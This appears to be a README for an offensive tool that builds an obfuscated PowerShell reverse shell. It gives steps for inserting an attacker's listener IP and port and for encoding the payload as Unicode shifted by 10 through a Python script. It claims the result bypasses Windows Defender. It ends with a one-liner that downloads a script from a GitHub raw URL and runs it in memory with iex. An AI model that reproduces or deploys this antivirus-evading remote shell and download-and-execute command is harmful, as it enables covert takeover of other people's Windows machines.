- Edit the Obfuscated PowerShell reverse shell one liner script with your chosen listener IP Address and Port number.
- Use the Python script to convert the PowerShell reverse shell one liner characters to its Unicode format. Every unicode decimal on the output already has +10 added from its original form. The PowerShell script (demontime.ps1) will then subtract 10 on each of those unicode from the array to convert it back to its original unicode form.
- Replace the Unicode payload on the demontime.ps1 script with the output generated from the Python script.
NOTE: You can also use the Obfuscated PowerShell reverse shell one liner template alone if you wanted to. This also bypasses Windows Defender but if you wanted to add more obfuscation, you can convert the characters to unicode using the supplied Python script.
Optional
Fork this repo so you can run the following one liner with your own IP Address and Port number straight from Github:
NOTE: Replace the URL with your own forked repo.
iex -Debug -Verbose -ErrorVariable $e -InformationAction Ignore -WarningAction Inquire (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/xxxxxxx/demontime/main/demontime.ps1')